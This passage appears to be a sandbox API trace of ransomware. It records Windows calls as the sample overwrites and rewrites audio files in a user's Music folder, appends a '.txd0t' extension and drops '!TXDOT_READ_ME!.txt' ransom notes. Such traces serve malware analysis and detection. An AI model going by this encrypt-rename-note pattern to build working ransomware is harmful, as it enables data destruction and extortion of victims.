[0074.968] GetProcessHeap () returned 0xe30000 [0074.968] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1330 | out: hHeap=0xe30000) returned 1 [0074.968] CloseHandle (hObject=0x47c) returned 1 [0074.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ji_rocyp5iamyiha11bq\\u7kca.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\ji_rocyp5iamyiha11bq\\u7kca.mp3.txd0t")) returned 1 [0074.971] SetEvent (hEvent=0x3f8) returned 1 [0074.971] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.974] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav" [0074.974] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav.txd0t" [0074.974] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav.txd0t") returned 0 [0074.974] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav", dwFileAttributes=0x80) returned 1 [0074.974] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav" (normalized: "c:\\users\\fd1hvy\\music\\m-t19pwphwjalohnq.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0074.974] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=42367) returned 1 [0074.974] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.974] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.975] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff5881, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.975] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xa570, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0xa570, lpOverlapped=0x0) returned 1 [0074.976] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff5a90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.976] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xa570, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0xa570, lpOverlapped=0x0) returned 1 [0074.976] FlushFileBuffers (hFile=0x468) returned 1 [0074.984] GetProcessHeap () returned 0xe30000 [0074.984] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x106) returned 0xe9d750 [0074.984] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav" [0074.984] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav") returned="m-T19pWPhwjALOHNq.wav" [0074.984] StrCpyW (in: psz1=0xe9d784, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.984] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\!TXDOT_READ_ME!.txt") returned 1 [0074.984] GetProcessHeap () returned 0xe30000 [0074.984] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0074.984] CloseHandle (hObject=0x468) returned 1 [0074.986] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav" (normalized: "c:\\users\\fd1hvy\\music\\m-t19pwphwjalohnq.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\m-t19pwphwjalohnq.wav.txd0t")) returned 1 [0074.987] SetEvent (hEvent=0x3f8) returned 1 [0074.987] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.988] StrCpyW (in: psz1=0x37ff460, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav" [0074.988] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav.txd0t" [0074.988] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav.txd0t") returned 0 [0074.988] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav", dwFileAttributes=0x80) returned 1 [0074.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\ioanbifvnbyskp4.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0074.988] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=94322) returned 1 [0074.988] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.988] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.989] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe8d8e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.989] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x17070, lpNumberOfBytesRead=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff420*=0x17070, lpOverlapped=0x0) returned 1 [0074.991] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe8f90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.991] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x17070, lpNumberOfBytesWritten=0x37ff424, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff424*=0x17070, lpOverlapped=0x0) returned 1 [0074.992] FlushFileBuffers (hFile=0x468) returned 1 [0074.994] GetProcessHeap () returned 0xe30000 [0074.994] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x128) returned 0xe9b648 [0074.994] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav" [0074.994] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav") returned="ioaNBIFVnbYskp4.wav" [0074.994] StrCpyW (in: psz1=0xe9b6a2, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.994] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\!TXDOT_READ_ME!.txt") returned 0 [0074.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.995] WriteFile (in: hFile=0x460, lpBuffer=0x37ff454*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x37ff454*, lpNumberOfBytesWritten=0x37ff450*=0x2, lpOverlapped=0x0) returned 1 [0074.996] FlushFileBuffers (hFile=0x460) returned 1 [0074.998] WriteFile (in: hFile=0x460, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff450*=0x7f0, lpOverlapped=0x0) returned 1 [0074.999] FlushFileBuffers (hFile=0x460) returned 1 [0075.000] CloseHandle (hObject=0x460) returned 1 [0075.000] GetProcessHeap () returned 0xe30000 [0075.000] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0075.000] CloseHandle (hObject=0x468) returned 1 [0075.003] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\ioanbifvnbyskp4.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\ioanbifvnbyskp4.wav.txd0t")) returned 1 [0075.003] SetEvent (hEvent=0x3f8) returned 1 [0075.003] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0075.006] StrCpyW (in: psz1=0x37ff460, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a" [0075.006] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a.txd0t" [0075.006] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a.txd0t") returned 0 [0075.006] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a", dwFileAttributes=0x80) returned 1 [0075.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\mo9azn_6jq9vybd _y.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0075.006] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=18508) returned 1 [0075.006] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.006] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0075.007] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffb5b4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.007] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x4840, lpNumberOfBytesRead=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff420*=0x4840, lpOverlapped=0x0) returned 1 [0075.007] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffb7c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.008] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x4840, lpNumberOfBytesWritten=0x37ff424, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff424*=0x4840, lpOverlapped=0x0) returned 1 [0075.008] FlushFileBuffers (hFile=0x460) returned 1 [0075.010] GetProcessHeap () returned 0xe30000 [0075.010] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x12e) returned 0xe9b648 [0075.010] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a" [0075.010] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a") returned="Mo9aZN_6Jq9VyBd _y.m4a" [0075.010] StrCpyW (in: psz1=0xe9b6a2, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.010] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\!TXDOT_READ_ME!.txt") returned 1 [0075.010] GetProcessHeap () returned 0xe30000 [0075.010] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0075.010] CloseHandle (hObject=0x460) returned 1 [0075.011] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\mo9azn_6jq9vybd _y.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\mo9azn_6jq9vybd _y.m4a.txd0t")) returned 1 [0075.012] SetEvent (hEvent=0x3f8) returned 1 [0075.012] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0075.013] StrCpyW (in: psz1=0x37ff450, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav" [0075.013] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav.txd0t" [0075.013] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav.txd0t") returned 0 [0075.013] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav", dwFileAttributes=0x80) returned 1 [0075.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\0jkj5_ifbam.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0075.013] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=18004) returned 1 [0075.013] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.013] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0075.014] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffb7ac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.014] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x4650, lpNumberOfBytesRead=0x37ff410, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff410*=0x4650, lpOverlapped=0x0) returned 1 [0075.015] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffb9b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.015] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x4650, lpNumberOfBytesWritten=0x37ff414, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff414*=0x4650, lpOverlapped=0x0) returned 1 [0075.015] FlushFileBuffers (hFile=0x460) returned 1 [0075.018] GetProcessHeap () returned 0xe30000 [0075.018] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x13e) returned 0xe9b648 [0075.018] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav" [0075.018] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav") returned="0JKj5_ifBaM.wav" [0075.018] StrCpyW (in: psz1=0xe9b6c0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.018] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\!TXDOT_READ_ME!.txt") returned 0 [0075.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0075.019] WriteFile (in: hFile=0x478, lpBuffer=0x37ff444*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x37ff444*, lpNumberOfBytesWritten=0x37ff440*=0x2, lpOverlapped=0x0) returned 1 [0075.020] FlushFileBuffers (hFile=0x478) returned 1 [0075.022] WriteFile (in: hFile=0x478, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff440*=0x7f0, lpOverlapped=0x0) returned 1 [0075.022] FlushFileBuffers (hFile=0x478) returned 1 [0075.023] CloseHandle (hObject=0x478) returned 1 [0075.024] GetProcessHeap () returned 0xe30000 [0075.024] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0075.024] CloseHandle (hObject=0x460) returned 1 [0075.027] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\0jkj5_ifbam.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\0jkj5_ifbam.wav.txd0t")) returned 1 [0075.027] SetEvent (hEvent=0x3f8) returned 1 [0075.027] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0075.028] StrCpyW (in: psz1=0x37ff450, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3" [0075.028] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3.txd0t" [0075.028] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3.txd0t") returned 0 [0075.028] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3", dwFileAttributes=0x80) returned 1 [0075.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\3mxwb597r4.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0075.029] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=73566) returned 1 [0075.029] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.029] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0075.030] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffedea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.030] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11f50, lpNumberOfBytesRead=0x37ff410, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff410*=0x11f50, lpOverlapped=0x0) returned 1 [0075.032] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffee0b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.032] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11f50, lpNumberOfBytesWritten=0x37ff414, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff414*=0x11f50, lpOverlapped=0x0) returned 1 [0075.032] FlushFileBuffers (hFile=0x460) returned 1 [0075.034] GetProcessHeap () returned 0xe30000 [0075.034] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x13c) returned 0xe9b648 [0075.034] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3" | out: 